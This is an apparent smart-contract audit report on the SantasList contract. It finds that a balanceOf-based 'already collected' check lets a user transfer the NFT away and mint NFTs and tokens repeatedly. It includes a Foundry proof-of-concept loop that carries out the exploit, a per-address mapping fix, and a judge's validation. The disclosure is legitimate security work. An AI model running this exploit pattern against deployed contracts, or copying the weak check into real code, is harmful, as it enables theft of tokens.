Submission Details
Severity: high
Valid

Extra nice user can mint unlimited

Summary

When Santa sets a user to extra nice twice, the user can mint unlimited SantaTokens and NFTs (when only nice once, unlimited NFTs).

Vulnerability Details

    if (balanceOf(msg.sender) > 0) {
        revert SantasList__AlreadyCollected();
    }

After collecting the rewards, the user can send the NFT to another user and keep collecting NFTs. A user who is extra nice twice can also collect unlimited tokens.

POC

    function test_extraNiceCanMintUnlimited() public {
        // When a user is set to extra nice by Santa, it can abuse this and mint unlimited NFTs and tokens
        vm.startPrank(santa);
        santasList.checkList(malicious, SantasList.Status.EXTRA_NICE);
        santasList.checkTwice(malicious, SantasList.Status.EXTRA_NICE);
        vm.stopPrank();
        // Move past the time from which presents can be collected
        vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
        vm.startPrank(malicious);
        santasList.setApprovalForAll(alice, true);
        for (uint256 i = 0; i < 100; i++) {
            // Transferring the NFT away resets balanceOf(malicious) to 0,
            // so the "already collected" check passes on the next iteration
            santasList.collectPresent();
            santasList.transferFrom(malicious, alice, i);
        }
        vm.stopPrank();
        // alice holds all 100 NFTs; malicious received a token reward on every call
        assertEq(santasList.balanceOf(alice), 100);
        assertEq(santaToken.balanceOf(malicious), 100e18);
    }

Impact

A user can mint unlimited tokens or NFTs.

Tools Used

Foundry

Recommendations

Add a mapping per address that stores when a user collected the present.
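
One way to implement this recommendation, as an added sketch that is not the SantasList source: a stripped-down token ledger in which the claim is tracked per address in a hypothetical `s_hasCollected` mapping (a boolean flag is assumed here), with the status and Christmas-time checks omitted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Added sketch, not the SantasList source. It isolates the "already
/// collected" check; s_hasCollected, NotTokenOwner and the ledger fields
/// are hypothetical names, and eligibility checks are left out.
contract CollectOnceSketch {
    error SantasList__AlreadyCollected();
    error NotTokenOwner();

    mapping(uint256 => address) public ownerOf;
    mapping(address => uint256) public balanceOf;
    // Claim state keyed by address: moving the NFT away cannot reset it.
    mapping(address => bool) private s_hasCollected;
    uint256 private s_tokenCounter;

    function collectPresent() external {
        // Weak check from the finding, reset by transferring the NFT:
        //   if (balanceOf(msg.sender) > 0) revert SantasList__AlreadyCollected();
        if (s_hasCollected[msg.sender]) {
            revert SantasList__AlreadyCollected();
        }
        // Record the claim before minting so the flag is set first.
        s_hasCollected[msg.sender] = true;
        uint256 tokenId = s_tokenCounter++;
        ownerOf[tokenId] = msg.sender;
        balanceOf[msg.sender] += 1;
    }

    // Simplified owner-only transfer, enough to replay the PoC's loop.
    function transferFrom(address from, address to, uint256 tokenId) external {
        if (ownerOf[tokenId] != from || msg.sender != from) {
            revert NotTokenOwner();
        }
        ownerOf[tokenId] = to;
        balanceOf[from] -= 1;
        balanceOf[to] += 1;
    }

    function hasCollected(address user) external view returns (bool) {
        return s_hasCollected[user];
    }
}
```

Replaying the PoC's loop against this sketch, the first `collectPresent()` succeeds and the second reverts with `SantasList__AlreadyCollected`, even though the caller's balance is back to 0 after the transfer.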

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
